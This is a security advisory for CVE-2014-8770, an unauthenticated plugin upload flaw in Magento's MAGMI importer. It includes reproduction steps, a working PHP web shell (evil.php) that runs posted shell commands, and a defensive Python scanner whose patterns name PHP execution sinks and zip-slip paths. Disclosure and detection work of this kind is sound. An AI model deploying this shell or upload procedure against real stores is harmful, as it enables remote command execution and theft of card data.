Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion

Related Vulnerabilities: CVE-2014-8770
Publish Date: 25 Oct 2014
Exploit found date: 10/24/2014
Security Researcher name: Parvinder Bhasin
Contact info:
twitter: @parvinderb - scorpio

Currently tested versions:
Magento version: Magento CE 1.8 and older
MAGMI version: v0.7.17a and older

Download software link:
Magento server:
MAGMI Plugin:

MAGMI (MAGento Mass Importer) suffers from a file inclusion vulnerability
(reported as RFI; in practice it is an unrestricted file upload: the plugin
installer extracts whatever ZIP it is handed into a web-served directory
without checking its contents), which allows an attacker to upload essentially
any PHP file without any sanity checks.  That PHP file can then be used to
skim credit card data, rewrite files, run remote commands, delete files, etc.
Note that magmi/web/magmi.php has no authentication of its own; unless the
operator has restricted the directory (HTTP Basic auth or an IP allow-list),
the installer, and therefore the upload, is reachable without credentials.
Essentially, this gives an attacker the ability to execute remote commands on
the vulnerable

Steps to reproduce:

1.  Open http://<a>/magmi/web/magmi.php
2.  Under "Upload new plugins", click "Choose file".
    MAGMI plugins are basically PHP files zipped, so create a PHP shell and
    zip it.  ex: evil.php  ex: zip file:  After the file
    has been uploaded, the page reports: "Plugin packaged installed."

Contents of evil.php (the advisory's shell, repaired so it parses; it
deliberately runs whatever is posted in the "command" field):

<?php
// Run the submitted command through the system shell and show its output.
if (isset($_POST['command'])) {
    $command = $_POST['command'];
    if (function_exists('shell_exec')) {
        $output = shell_exec($command);
        echo "<pre>" . htmlspecialchars($output) . "</pre>";
    } else {
        echo "<pre>shell_exec() is disabled on this host</pre>";
    }
}
// Always render the command form so the shell can be reused.
echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>
      </form>";

3.  Your malicious evil.php file is now extracted.  All you then need to do
    is access the evil.php page from:
    At this point you have command execution as the web server user, which is
    enough to download malware, attempt to escalate privileges and install
    rootkits, skim credit card data, etc.
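For the defender's side of the procedure above, the following is an added example (not part of the advisory, and not MAGMI's own code): a scanner that walks a Magento document root for PHP files in which request input ($_POST, $_GET, ...) sits next to a command or code execution sink, which is exactly the shape of evil.php, and that inspects a plugin ZIP before installation for the same thing plus zip-slip paths. The sample tree, the plugin layout under magmi/plugins, and the file names are constructed assumptions.

```python
"""Hunt for web shells dropped through MAGMI's plugin installer (added example)."""
import os
import re
import tempfile
import zipfile

# PHP execution sinks a dropped shell typically calls.
SINK_RE = re.compile(r"\b(shell_exec|system|passthru|exec|popen|proc_open|eval|assert)\s*\(")
# Request superglobals an attacker controls directly.
SOURCE_RE = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[")
# Backtick operator: `...$x...` runs a shell command in PHP.
BACKTICK_RE = re.compile(r"`[^`\n]*\$[^`\n]*`")
PHP_EXTS = (".php", ".phtml", ".php5", ".phar")


def classify_php(src):
    """Return the reasons this PHP source looks like a web shell (empty list if clean)."""
    reasons = []
    sinks = sorted(set(SINK_RE.findall(src)))
    if sinks and SOURCE_RE.search(src):
        reasons.append("request input next to execution sink(s): " + ", ".join(sinks))
    if BACKTICK_RE.search(src) and SOURCE_RE.search(src):
        reasons.append("backtick shell execution with request input")
    return reasons


def scan_tree(root):
    """Scan every PHP file under root; return {relative path: reasons} for suspicious files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTS):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                reasons = classify_php(fh.read())
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


def scan_plugin_zip(zip_path):
    """Inspect a MAGMI plugin package before it is installed, without extracting it.

    Flags entries that would escape the plugin directory (absolute paths or '..')
    and PHP members that look like shells.
    """
    findings = {}
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            name = info.filename
            parts = name.replace("\\", "/").split("/")
            if name.startswith("/") or ".." in parts:
                findings[name] = ["path escapes the plugin directory"]
                continue
            if name.lower().endswith(PHP_EXTS):
                reasons = classify_php(zf.read(info).decode("utf-8", errors="replace"))
                if reasons:
                    findings[name] = reasons
    return findings


# Constructed samples (assumptions): the advisory's evil.php and a harmless plugin file.
EVIL_PHP = """<?php
if (isset($_POST['command'])) {
    $output = shell_exec($_POST['command']);
    echo "<pre>$output</pre>";
}
"""
BENIGN_PHP = """<?php
class Demo_ItemProcessor {
    public function processItemAfterId(&$item, $params = null) {
        return isset($item['sku']);
    }
}
"""


def demo():
    """Build a throwaway magmi/plugins tree and a plugin ZIP, scan both, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        plugins = os.path.join(root, "magmi", "plugins")  # assumed install location
        os.makedirs(os.path.join(plugins, "extra"))
        os.makedirs(os.path.join(plugins, "base"))
        with open(os.path.join(plugins, "extra", "evil.php"), "w") as fh:
            fh.write(EVIL_PHP)
        with open(os.path.join(plugins, "base", "demo_processor.php"), "w") as fh:
            fh.write(BENIGN_PHP)
        zip_path = os.path.join(root, "plugin.zip")
        with zipfile.ZipFile(zip_path, "w") as zf:
            zf.writestr("extra/evil.php", EVIL_PHP)
            zf.writestr("../../index.php", EVIL_PHP)  # zip-slip entry
            zf.writestr("base/demo_processor.php", BENIGN_PHP)
        return scan_tree(root), scan_plugin_zip(zip_path)


if __name__ == "__main__":
    tree, package = demo()
    for path, reasons in sorted(tree.items()):
        print("[tree]    %s: %s" % (path, "; ".join(reasons)))
    for path, reasons in sorted(package.items()):
        print("[package] %s: %s" % (path, "; ".join(reasons)))
```

Run scan_tree against the real document root during incident response (a shell may have been renamed, so do not rely on "evil.php"); the heuristic produces false positives on legitimate admin tooling, so treat a hit as a lead, not a verdict. The ZIP inspection is the sanity check the installer lacks, but because real MAGMI plugins are themselves zipped PHP, no content filter replaces restricting access to magmi/web.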